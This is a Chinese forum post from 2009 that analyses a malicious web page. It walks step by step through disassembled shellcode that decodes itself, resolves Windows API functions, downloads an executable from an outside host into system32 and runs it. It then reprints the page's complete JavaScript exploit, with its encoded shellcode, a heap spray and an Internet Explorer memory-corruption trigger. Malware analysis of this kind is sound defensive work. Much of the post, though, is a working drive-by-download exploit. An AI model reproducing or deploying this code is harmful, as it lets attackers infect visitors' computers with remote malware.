1、初始化代码
00401000 > $ 8D85 70FEFFFF lea eax, dword ptr [ebp-190]
00401006 . 50 push eax ; /pWSAData
00401007 . 68 01010000 push 101 ; |RequestedVersion = 101 (1.1.)
0040100C . FF15 18504000 call dword ptr [<&Ws2_32.WSAStartup>] ; \WSAStartup
2、乱乱的代码,因为还没有解密
00401024 . /EB 0F jmp short 00401035 /// 跳去开始解密
00401026 $ |5B pop ebx
00401027 . |33C9 xor ecx, ecx
00401029 . |66:B9 8001 mov cx, 180
0040102D > |8033 EF xor byte ptr [ebx], 0EF /// xor 密钥 EF
00401030 . |43 inc ebx
00401031 .^|E2 FA loopd short 0040102D /// 循环解密
00401033 . |EB 05 jmp short 0040103A /// 解密完成自然要跳出去了
00401035 > \E8 ECFFFFFF call 00401026 /// 解密call
0040103A >- 7F 8B jg short 00400FC7
0040103C . 4E dec esi
0040103D . DFEF fucomip st, st(7)
0040103F > EF out dx, eax
00401040 . EF out dx, eax
00401041 . 64:AF scas dword ptr es:[edi]
00401043 . E3 64 jecxz short 004010A9
00401045 . 9F lahf
00401046 . F3: prefix rep:
00401047 . 42 inc edx
00401048 . 64:9F lahf
0040104A . E7 6E out 6E, eax
0040104C . 03EF add ebp, edi
0040104E .^ EB EF jmp short 0040103F
00401050 EF db EF
00401051 64 db 64 ; CHAR 'd'
00401052 03 db 03
00401053 . B9 8761A1E1 mov ecx, E1A16187
00401058 . 0307 add eax, dword ptr [edi]
0040105A . 11EF adc edi, ebp
0040105C . EF out dx, eax
0040105D . EF out dx, eax
0040105E . 66:AA stos byte ptr es:[edi]
00401060 .^ EB B9 jmp short 0040101B
00401062 87 db 87
00401063 77 db 77 ; CHAR 'w'
00401064 11 db 11
00401065 65 db 65 ; CHAR 'e'
00401066 E1 db E1
00401067 07 db 07
00401068 1F db 1F
00401069 EF db EF
0040106A EF db EF
0040106B EF db EF
0040106C 66 db 66 ; CHAR 'f'
0040106D AA db AA
0040106E E7 db E7
0040106F B9 db B9
00401070 87 db 87
00401071 CA db CA
00401072 5F db 5F ; CHAR '_'
…………………………
00401183 1D db 1D
00401184 9B db 9B
00401185 E7 db E7
00401186 2E db 2E ; CHAR '.'
00401187 21 db 21 ; CHAR '!'
00401188 E2 db E2
00401189 EC db EC
0040118A 1D db 1D
0040118B AF db AF
0040118C 04 db 04
0040118D 1E db 1E
0040118E D4 db D4
0040118F 11 db 11
00401190 B1 db B1
00401191 9A db 9A
00401192 0A db 0A
00401193 B5 db B5
00401194 64 db 64 ; CHAR 'd'
00401195 . 04 db 04
00401196 . 64 B5 CB EC ascii "d邓?
0040119A 32 db 32 ; CHAR '2'
3、通过PEB获取kerner32.dll地址
0040103B 64:A1 30000000 mov eax, dword ptr fs:[30] // 线程控制块TEB偏移位置0x30的位置存在着指向进程控制块PEB的指针
00401041 8B40 0C mov eax, dword ptr [eax+C] // 进程控制块PEB偏移位置0x0C的地方存放着指向PEB_LDR_DATA结构体的指针,其中存放着已经被进程装载的动态链接库的信息
00401044 8B70 1C mov esi, dword ptr [eax+1C] // PEB_LDR_DATA结构体偏移位置为0x1C的地方存放着指向初始化链表的头指针InInitializationOrderModuleList
00401047 AD lods dword ptr [esi] // 模块初始化链表InInitializationOrderModuleList中按顺序存放着PE装入运行时初始化模块的信息,第一个链表节点时ntdll.dll,第二个链表节点就是kernel32.dll
00401048 8B70 08 mov esi, dword ptr [eax+8] // 找到属于kernel32.dll的节点以后,在其基础上偏移0x08就是kernel32.dll在内存中的加载基地址
0040104B 81EC 00040000 sub esp, 400
00401051 8BEC mov ebp, esp
00401053 56 push esi /// esi=7C800000 (kernel32.7C800000)
00401054 68 8E4E0EEC push EC0E4E8E /// 压入EC0E4E8E,呆会计算有用
4、通过计算寻址
0040115C 55 push ebp
0040115D 8BEC mov ebp, esp
0040115F 8B7D 08 mov edi, dword ptr [ebp+8] ; EC0E4E8E
00401162 8B5D 0C mov ebx, dword ptr [ebp+C] ; [0012FBC0]=7C800000 (kernel32.7C800000)
00401165 56 push esi
00401166 8B73 3C mov esi, dword ptr [ebx+3C] ; [7C80003C]=000000E8
00401169 8B741E 78 mov esi, dword ptr [esi+ebx+78] ; [7C800160]=0000262C
0040116D 03F3 add esi, ebx ; 7C800000+262C
0040116F 56 push esi ; esi=7C80262C (kernel32.7C80262C)
00401170 8B76 20 mov esi, dword ptr [esi+20] ; esi=00003528
00401173 03F3 add esi, ebx ; 7C800000+3528
00401175 33C9 xor ecx, ecx
00401177 49 dec ecx
00401178 41 inc ecx
00401179 AD lods dword ptr [esi] ; [esi]=[7C803528]=00004B73
0040117A 03C3 add eax, ebx ; 7C800000+4B73
0040117C 56 push esi
0040117D 33F6 xor esi, esi
0040117F 0FBE10 movsx edx, byte ptr [eax]
00401182 3AF2 cmp dh, dl
00401184 74 08 je short 0040118E
00401186 C1CE 0D ror esi, 0D
00401189 03F2 add esi, edx
0040118B 40 inc eax
0040118C ^ EB F1 jmp short 0040117F
0040118E 3BFE cmp edi, esi
00401190 5E pop esi
00401191 ^ 75 E5 jnz short 00401178
00401193 5A pop edx
00401194 8BEB mov ebp, ebx
00401196 8B5A 24 mov ebx, dword ptr [edx+24]
00401199 03DD add ebx, ebp
0040119B 66:8B0C4B mov cx, word ptr [ebx+ecx*2]
0040119F 8B5A 1C mov ebx, dword ptr [edx+1C]
004011A2 03DD add ebx, ebp
004011A4 8B048B mov eax, dword ptr [ebx+ecx*4]
004011A7 03C5 add eax, ebp
004011A9 5E pop esi
004011AA 5D pop ebp
004011AB C2 0800 retn 8
5、通过同一个call,压入不同的初始参数,计算出需要调用的dll
00401053 56 push esi ; esi=7C800000 (kernel32.7C800000)
00401054 68 8E4E0EEC push EC0E4E8E
00401059 E8 FE000000 call 0040115C
0040105E 8945 04 mov dword ptr [ebp+4], eax ; eax=7C801D77 (kernel32.LoadLibraryA)
00401061 56 push esi
00401062 68 98FE8A0E push 0E8AFE98
00401067 E8 F0000000 call 0040115C
0040106C 8945 08 mov dword ptr [ebp+8], eax ; eax=7C86114D (kernel32.WinExec)
0040106F 56 push esi
00401070 68 25B0FFC2 push C2FFB025
00401075 E8 E2000000 call 0040115C
0040107A 8945 0C mov dword ptr [ebp+C], eax ; eax=7C81E85C (kernel32.DeleteFileA)
0040107D 56 push esi
0040107E 68 EFCEE060 push 60E0CEEF
00401083 E8 D4000000 call 0040115C
00401088 8945 10 mov dword ptr [ebp+10], eax ; eax=7C80CCA9 (kernel32.ExitThread)
0040108B 56 push esi
0040108C 68 C179E5B8 push B8E579C1
00401091 E8 C6000000 call 0040115C
00401096 8945 14 mov dword ptr [ebp+14], eax ; eax=7C814C63 (kernel32.GetSystemDirectoryA)
00401099 40 inc eax
0040109A 8038 C3 cmp byte ptr [eax], 0C3
0040109D ^ 75 FA jnz short 00401099
6、加载dll,如果原来下载过则先删除再下载,通过计算获得URLMON.URLDownloadToFileA地址执行下载指定文件到系统目录,执行后退出线程
004010A8 8975 24 mov dword ptr [ebp+24], esi
004010AB 8B45 04 mov eax, dword ptr [ebp+4] ; kernel32.LoadLibraryA
004010AE 6A 01 push 1
004010B0 59 pop ecx
004010B1 8B55 18 mov edx, dword ptr [ebp+18]
004010B4 56 push esi
004010B5 E8 8B000000 call 00401145
004010BA 50 push eax ; eax=75C60000 (URLMON.75C60000)
004010BB 68 361A2F70 push 702F1A36
004010C0 E8 97000000 call 0040115C
004010C5 8945 1C mov dword ptr [ebp+1C], eax ; URLMON.URLDownloadToFileA
004010C8 8BC5 mov eax, ebp
004010CA 83C0 50 add eax, 50
004010CD 8945 20 mov dword ptr [ebp+20], eax
004010D0 68 FF000000 push 0FF
004010D5 50 push eax
004010D6 8B45 14 mov eax, dword ptr [ebp+14] ; kernel32.GetSystemDirectoryA
004010D9 6A 02 push 2
004010DB 59 pop ecx
004010DC 8B55 18 mov edx, dword ptr [ebp+18]
004010DF E8 61000000 call 00401145 ; C:\WINDOWS\system32
004010E4 0345 20 add eax, dword ptr [ebp+20]
004010E7 C700 5C7E2E65 mov dword ptr [eax], 652E7E5C /// \~.e
004010ED C740 04 7865000>mov dword ptr [eax+4], 6578 /// xe
004010F4 FF75 20 push dword ptr [ebp+20] /// C:\WINDOWS\system32\~.exe
004010F7 8B45 0C mov eax, dword ptr [ebp+C] ; kernel32.DeleteFileA
004010FA 6A 01 push 1
004010FC 59 pop ecx
004010FD 8B55 18 mov edx, dword ptr [ebp+18]
00401100 E8 40000000 call 00401145 /// 删除C:\WINDOWS\system32\~.exe
00401105 6A 07 push 7
00401107 58 pop eax
00401108 0345 24 add eax, dword ptr [ebp+24]
0040110B 33DB xor ebx, ebx
0040110D 53 push ebx
0040110E 53 push ebx
0040110F FF75 20 push dword ptr [ebp+20] ; C:\WINDOWS\system32\~.exe
00401112 50 push eax /// hxxp://w.qqnetcn.cn/dd.exe
00401113 53 push ebx
00401114 8B45 1C mov eax, dword ptr [ebp+1C] /// 调用URLMON.URLDownloadToFileA
00401117 6A 05 push 5
00401119 59 pop ecx
0040111A 8B55 18 mov edx, dword ptr [ebp+18]
0040111D E8 23000000 call 00401145 /// 执行下载,文件名保存为~.exe
00401122 6A 00 push 0
00401124 FF75 20 push dword ptr [ebp+20]
00401127 8B45 08 mov eax, dword ptr [ebp+8] ; kernel32.WinExec
0040112A 6A 02 push 2
0040112C 59 pop ecx
0040112D 8B55 18 mov edx, dword ptr [ebp+18]
00401130 E8 10000000 call 00401145 /// 运行刚下载的文件C:\WINDOWS\system32\~.exe
00401135 6A FF push -1
00401137 8B45 10 mov eax, dword ptr [ebp+10] ; kernel32.ExitThread
0040113A 6A 01 push 1
0040113C 59 pop ecx
0040113D 8B55 18 mov edx, dword ptr [ebp+18]
00401140 E8 00000000 call 00401145 /// 运行完毕退出线程
7、源代码
<SCRIPT language="javascript">
JoewmLoad = unescape("%u7468%u7074%u2F3A%u772F%u712E%u6E71%u7465%u6E63%u632E%u2F6E%u6464%u652E%u6578%u0000");
var nod32="%"+"u"+"9"+"0"+"9"+"0%"+"u9"+"0"+"90%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805";
var nod33="%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d";
var nod34="%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf";
var nod35="%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba";
var nod36="%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4";
var shellcode = unescape(nod32+"%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb"+nod33+"%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615"+"%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa"+nod34+"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3"+nod35+"%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64"+nod36+"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1");
shellcode=shellcode+JoewmLoad;
var array = new Array();
var ls = 1044099;
var Joewm="%"+"u"+"0"+"D"+"0"+"D"+"%"+"u"+"0"+"D"+"0"+"D";
var b = unescape(Joewm); while(b.length<ls) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;
for(i=0; i<0xD0; i++) {
array[i] = lh + shellcode;
}
CollectGarbage();
var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody");
o1.click;
var o2 = o1.cloneNode();
o1.clearAttributes();
o1=null; CollectGarbage();
for(var x=0;x<a1.length;x++) a1[x].src=s1;
o2.click;
</script> |
|
发表于 2009-8-22 14:59
